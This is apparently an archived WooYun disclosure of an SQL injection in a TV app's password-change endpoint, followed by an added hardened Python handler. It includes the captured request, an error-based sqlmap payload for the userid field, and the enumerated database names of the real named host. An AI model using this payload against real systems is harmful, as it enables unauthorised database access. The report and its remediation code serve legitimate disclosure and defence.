WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader ------------------- http://drop.zone.ci/
2015-05-19: Details reported to the vendor and awaiting vendor handling
2015-05-19: Vendor confirmed; details disclosed to the vendor only
2015-05-29: Details disclosed to core white hats and relevant domain experts
2015-06-08: Details disclosed to regular white hats
2015-06-18: Details disclosed to intern white hats
2015-07-03: Details disclosed to the public
光息谷 (an app owned by 云视): POST injection at the password-change endpoint, captured request

POST /e/extend/new_client_api/psw_modify.php HTTP/1.1
Host: www.hktv.tv
Proxy-Connection: keep-alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 26
Connection: keep-alive
User-Agent: ?????ˉè°· 2.9 (iPhone; iPhone OS 8.3; zh_CN)

userid=1&password=qqqqqq
Proof:

f any)? [y/N] n
sqlmap identified the following injection points with a total of 58 HTTP(s) requests:
---
Place: POST
Parameter: userid
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: userid=1 AND (SELECT 3863 FROM(SELECT COUNT(*),CONCAT(0x3a6c766c3a,(SELECT (CASE WHEN (3863=3863) THEN 1 ELSE 0 END)),0x3a6178773a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&password=qqqqqq
---
[17:16:09] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.23
back-end DBMS: MySQL 5.0
[17:16:09] [INFO] fetched data logged to text files under 'D:\Python27\sqlmap\output\www.hktv.tv'
[*] shutting down at 17:16:09
Databases:

available databases [24]:
[*] bbs_hktv
[*] cdp
[*] cms_as
[*] cms_hktv
[*] information_schema
[*] jsbc-security
[*] meicam
[*] mysql
[*] odp
[*] onairfastedit
[*] onairtranscode
[*] ors
[*] performance_schema
[*] security_as
[*] security_hktv
[*] security_hn
[*] vms
[*] vms_as
[*] vms_hktv
[*] vms_jyg
[*] vms_sjs
[*] wechat_hn
[*] wechat_sjs
[*] yicloud_aliyun_rds_dummy_database
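The root cause reported above is that the `userid` field of psw_modify.php reaches a MySQL query as raw text. The hardened handler below is an added example and not the vendor's code: it is written in Python with an in-memory SQLite table standing in for the app's MySQL user table (constructed sample data), rejects any `userid` that is not a plain integer before touching the database, and binds both values as query parameters so the error-based payload from the sqlmap output can no longer change the statement.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed copies of the two POST bodies in the report: the app's normal
# request, and the error-based payload sqlmap reported for the userid field.
NORMAL_BODY = "userid=1&password=qqqqqq"
SQLMAP_BODY = (
    "userid=1 AND (SELECT 3863 FROM(SELECT COUNT(*),CONCAT(0x3a6c766c3a,"
    "(SELECT (CASE WHEN (3863=3863) THEN 1 ELSE 0 END)),0x3a6178773a,"
    "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
    "&password=qqqqqq"
)

# An account id is a bare integer; anything else is rejected up front.
USERID_RE = re.compile(r"^[0-9]{1,10}$")


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into single values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def psw_modify(conn: sqlite3.Connection, body: str) -> str:
    """Hardened password-change handler: validate, then bind parameters."""
    form = parse_form(body)
    userid = form.get("userid", "")
    password = form.get("password", "")
    if not USERID_RE.match(userid):
        return "rejected: userid must be numeric"
    if len(password) < 6:
        return "rejected: password too short"
    # Both values travel as bound parameters, never as SQL text. (A real
    # handler would store a password hash here rather than the password.)
    cur = conn.execute("UPDATE users SET password=? WHERE userid=?",
                       (password, int(userid)))
    conn.commit()
    return "ok" if cur.rowcount == 1 else "rejected: unknown userid"


def demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the app's user table (constructed sample rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userid INTEGER PRIMARY KEY, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "old"), (2, "old")])
    return conn
```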
RT (as in the title).
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-05-19 09:50
Thank you for your attention; we will fix this issue as soon as possible. Thank you.
None yet.